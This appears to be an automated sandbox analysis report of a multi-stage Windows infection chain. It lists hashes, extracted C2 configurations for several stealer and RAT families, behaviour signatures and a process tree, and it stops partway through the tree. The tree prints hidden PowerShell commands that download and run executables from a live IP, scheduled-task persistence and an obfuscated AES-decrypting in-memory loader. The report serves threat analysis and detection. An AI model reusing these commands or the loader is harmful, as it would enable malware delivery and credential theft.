Analysis

  • max time kernel
    148s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-02-2025 06:02

General

  • Target

    efff026f46c677e98f53e834d1f074030d2a33d93289f9bbaa26c47451d63989.exe

  • Size

    2.0MB

  • MD5

    41bfbce19932e1a75259a03ba23bdd33

  • SHA1

    af829594dc191d8dc5f0bcdde496d1b98130d754

  • SHA256

    efff026f46c677e98f53e834d1f074030d2a33d93289f9bbaa26c47451d63989

  • SHA512

    cd22466d28e428f54be72326d3475065711d64e637d03a1c043e66591cd6508b8a88ba1e1fb0b34b48275b6cd5e8ad17346ad032a77d2c87e44fd129e4ff538d

  • SSDEEP

    49152:dOcb9F16Y7tPT0JCy0wzbtpFfUrSv/YVNNHAqo:koV7t70JCyCuv/uBo

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

systembc

C2

cobolrationumelawrtewarms.co:4001

93.186.202.3:4001

Attributes
  • dns

    5.132.191.104

    ns1.vic.au.dns.opennic.glue

    ns2.vic.au.dns.opennic.glue

Extracted

Family

xworm

Version

5.0

C2

45.154.98.175:7000

Mutex

0HzpJoisb4u9PgIO

Attributes
  • Install_directory

    %AppData%

  • install_file

    google_updates.exe

aes.plain

Extracted

Family

vidar

C2

https://t.me/g02f04

https://steamcommunity.com/profiles/76561199828130190

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0

Extracted

Family

redline

Botnet

cheat

C2

103.84.89.222:33791

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Vidar Stealer 6 IoCs
  • Detect Xworm Payload 2 IoCs
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Redline family
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 2 IoCs
  • Sectoprat family
  • SystemBC

    SystemBC is a proxy and remote administration tool first seen in 2019.

  • Systembc family
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 25 IoCs
  • Blocklisted process makes network request 64 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file 32 IoCs
  • Uses browser remote debugging 2 TTPs 9 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 50 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 8 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 4 IoCs
  • Executes dropped EXE 51 IoCs
  • Identifies Wine through registry keys 2 TTPs 25 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 31 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • AutoIT Executable 3 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 25 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Drops file in Windows directory 6 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 7 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 19 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 8 IoCs
  • Kills process with taskkill 10 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 38 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\efff026f46c677e98f53e834d1f074030d2a33d93289f9bbaa26c47451d63989.exe
    "C:\Users\Admin\AppData\Local\Temp\efff026f46c677e98f53e834d1f074030d2a33d93289f9bbaa26c47451d63989.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:4844
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:3016
      • C:\Users\Admin\AppData\Local\Temp\1086173001\oVpNTUm.exe
        "C:\Users\Admin\AppData\Local\Temp\1086173001\oVpNTUm.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:760
      • C:\Users\Admin\AppData\Local\Temp\1086621001\3omTNLZ.exe
        "C:\Users\Admin\AppData\Local\Temp\1086621001\3omTNLZ.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:1348
      • C:\Users\Admin\AppData\Local\Temp\1086705101\ce5fd68915.exe
        "C:\Users\Admin\AppData\Local\Temp\1086705101\ce5fd68915.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:3936
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c schtasks /create /tn q4bAAmaMrF0 /tr "mshta C:\Users\Admin\AppData\Local\Temp\qb1lZ4zWM.hta" /sc minute /mo 25 /ru "Admin" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4364
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /tn q4bAAmaMrF0 /tr "mshta C:\Users\Admin\AppData\Local\Temp\qb1lZ4zWM.hta" /sc minute /mo 25 /ru "Admin" /f
            5⤵
            • Scheduled Task/Job: Scheduled Task
            PID:1452
        • C:\Windows\SysWOW64\mshta.exe
          mshta C:\Users\Admin\AppData\Local\Temp\qb1lZ4zWM.hta
          4⤵
          • Checks computer location settings
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3888
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'BJB8MMEDQILQJYVSA5CANMNRZKTGT1X2.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Downloads MZ/PE file
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4464
            • C:\Users\Admin\AppData\Local\TempBJB8MMEDQILQJYVSA5CANMNRZKTGT1X2.EXE
              "C:\Users\Admin\AppData\Local\TempBJB8MMEDQILQJYVSA5CANMNRZKTGT1X2.EXE"
              6⤵
              • Modifies Windows Defender DisableAntiSpyware settings
              • Modifies Windows Defender Real-time Protection settings
              • Modifies Windows Defender TamperProtection settings
              • Modifies Windows Defender notification settings
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Windows security modification
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1880
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1086706021\am_no.cmd" "
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4384
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1086706021\am_no.cmd" any_word
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3664
          • C:\Windows\SysWOW64\timeout.exe
            timeout /t 2
            5⤵
            • System Location Discovery: System Language Discovery
            • Delays execution with timeout.exe
            PID:956
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4968
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2524
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2776
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3604
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:768
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4364
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /tn "yjwdrmaHaWu" /tr "mshta \"C:\Temp\yokj3B92d.hta\"" /sc minute /mo 25 /ru "Admin" /f
            5⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:2624
          • C:\Windows\SysWOW64\mshta.exe
            mshta "C:\Temp\yokj3B92d.hta"
            5⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:1716
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
              6⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Downloads MZ/PE file
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2280
              • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                7⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:4028
      • C:\Users\Admin\AppData\Local\Temp\1086800001\9f63f4acb4.exe
        "C:\Users\Admin\AppData\Local\Temp\1086800001\9f63f4acb4.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:4032
      • C:\Users\Admin\AppData\Local\Temp\1086801001\9ce8b15e02.exe
        "C:\Users\Admin\AppData\Local\Temp\1086801001\9ce8b15e02.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Writes to the Master Boot Record (MBR)
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:712
      • C:\Users\Admin\AppData\Local\Temp\1086802001\e11c49ce9a.exe
        "C:\Users\Admin\AppData\Local\Temp\1086802001\e11c49ce9a.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:2816
      • C:\Users\Admin\AppData\Local\Temp\1086803001\7bf33bfbf1.exe
        "C:\Users\Admin\AppData\Local\Temp\1086803001\7bf33bfbf1.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        PID:4668
        • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
          "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
          4⤵
            PID:5668
        • C:\Users\Admin\AppData\Local\Temp\1086804001\C3hYpvm.exe
          "C:\Users\Admin\AppData\Local\Temp\1086804001\C3hYpvm.exe"
          3⤵
          • Drops startup file
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:4384
        • C:\Users\Admin\AppData\Local\Temp\1086805001\Bjkm5hE.exe
          "C:\Users\Admin\AppData\Local\Temp\1086805001\Bjkm5hE.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          PID:3400
          • C:\Users\Admin\AppData\Local\Temp\1086805001\Bjkm5hE.exe
            "C:\Users\Admin\AppData\Local\Temp\1086805001\Bjkm5hE.exe"
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:1192
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3400 -s 952
            4⤵
            • Program crash
            PID:1564
        • C:\Users\Admin\AppData\Local\Temp\1086806001\qFqSpAp.exe
          "C:\Users\Admin\AppData\Local\Temp\1086806001\qFqSpAp.exe"
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:3656
        • C:\Users\Admin\AppData\Local\Temp\1086807001\oVpNTUm.exe
          "C:\Users\Admin\AppData\Local\Temp\1086807001\oVpNTUm.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:5116
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1086808041\tYliuwV.ps1"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops startup file
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2736
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:1648
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$MoqZ='DeKyLvcoKyLvmprKyLveKyLvssKyLv'.Replace('KyLv', ''),'EJwaGlemJwaGeJwaGnJwaGtJwaGAtJwaG'.Replace('JwaG', ''),'CrgSdPegSdPagSdPtgSdPegSdPDecgSdPrypgSdPtorgSdP'.Replace('gSdP', ''),'EnAUSatAUSaryAUSaPAUSaoiAUSantAUSa'.Replace('AUSa', ''),'RifKyeaifKydifKyLiifKyneifKysifKy'.Replace('ifKy', ''),'CoIpkTpyIpkTTIpkToIpkT'.Replace('IpkT', ''),'LRxQFoRxQFaRxQFdRxQF'.Replace('RxQF', ''),'ChPYPIanPYPIgPYPIePYPIExPYPItenPYPIsioPYPInPYPI'.Replace('PYPI', ''),'SplhjTaihjTathjTa'.Replace('hjTa', ''),'IVERYnvoVERYkeVERY'.Replace('VERY', ''),'MaGACXinMGACXoduGACXlGACXeGACX'.Replace('GACX', ''),'GetEffVCuEffVrreEffVnEffVtPEffVroEffVceEffVsEffVsEffV'.Replace('EffV', ''),'TrgFlMagFlMnsgFlMfogFlMrmgFlMFingFlMalgFlMBgFlMlogFlMcgFlMkgFlM'.Replace('gFlM', ''),'FZnjbroZnjbmBaZnjbseZnjb64ZnjbSZnjbtZnjbrinZnjbgZnjb'.Replace('Znjb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($MoqZ[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function OcByW($zyHkO){$MahHK=[System.Security.Cryptography.Aes]::Create();$MahHK.Mode=[System.Security.Cryptography.CipherMode]::CBC;$MahHK.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$MahHK.Key=[System.Convert]::($MoqZ[13])('AAMGkknb01QKxJVl43m9//ZRwVkG6pEiu9VVo6uyG5U=');$MahHK.IV=[System.Convert]::($MoqZ[13])('/W6oLxKJHKSzHfvUm38XsQ==');$RyLXH=$MahHK.($MoqZ[2])();$Vocox=$RyLXH.($MoqZ[12])($zyHkO,0,$zyHkO.Length);$RyLXH.Dispose();$MahHK.Dispose();$Vocox;}function dAZyU($zyHkO){$CHeOb=New-Object System.IO.MemoryStream(,$zyHkO);$PxKaw=New-Object System.IO.MemoryStream;$ikNUp=New-Object System.IO.Compression.GZipStream($CHeOb,[IO.Compression.CompressionMode]::($MoqZ[0]));$ikNUp.($MoqZ[5])($PxKaw);$ikNUp.Dispose();$CHeOb.Dispose();$PxKaw.Dispose();$PxKaw.ToArray();}$ygeKx=[System.IO.File]::($MoqZ[4])([Console]::Title);$WLLeN=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 5).Substring(2))));$PCQGF=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 6).Substring(2))));[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$PCQGF).($MoqZ[3]).($MoqZ[9])($null,$null);[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$WLLeN).($MoqZ[3]).($MoqZ[9])($null,$null); "
              5⤵
              • System Location Discovery: System Language Discovery
              PID:3812
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              5⤵
              • Blocklisted process makes network request
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4912
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:5096
        • C:\Users\Admin\AppData\Local\Temp\1086809001\DTQCxXZ.exe
          "C:\Users\Admin\AppData\Local\Temp\1086809001\DTQCxXZ.exe"
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:4604
        • C:\Users\Admin\AppData\Local\Temp\1086810001\7aencsM.exe
          "C:\Users\Admin\AppData\Local\Temp\1086810001\7aencsM.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          PID:920
          • C:\Users\Admin\AppData\Local\Temp\1086810001\7aencsM.exe
            "C:\Users\Admin\AppData\Local\Temp\1086810001\7aencsM.exe"
            4⤵
            • Checks computer location settings
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            PID:1632
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
              5⤵
              • Uses browser remote debugging
              • Enumerates system info in registry
              • Modifies data under HKEY_USERS
              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of FindShellTrayWindow
              PID:4468
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff93cdecc40,0x7ff93cdecc4c,0x7ff93cdecc58
                6⤵
                  PID:412
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1924,i,17391268965578064136,4953445333590501740,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1920 /prefetch:2
                  6⤵
                    PID:1892
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2148,i,17391268965578064136,4953445333590501740,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2164 /prefetch:3
                    6⤵
                      PID:688
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2236,i,17391268965578064136,4953445333590501740,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2252 /prefetch:8
                      6⤵
                        PID:3772
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3172,i,17391268965578064136,4953445333590501740,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3180 /prefetch:1
                        6⤵
                        • Uses browser remote debugging
                        PID:3248
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3188,i,17391268965578064136,4953445333590501740,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3224 /prefetch:1
                        6⤵
                        • Uses browser remote debugging
                        PID:4376
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4484,i,17391268965578064136,4953445333590501740,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4252 /prefetch:8
                        6⤵
                          PID:2028
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4328,i,17391268965578064136,4953445333590501740,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4672 /prefetch:1
                          6⤵
                          • Uses browser remote debugging
                          PID:4576
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4876,i,17391268965578064136,4953445333590501740,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4872 /prefetch:8
                          6⤵
                            PID:4816
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4680,i,17391268965578064136,4953445333590501740,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4928 /prefetch:8
                            6⤵
                              PID:3448
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
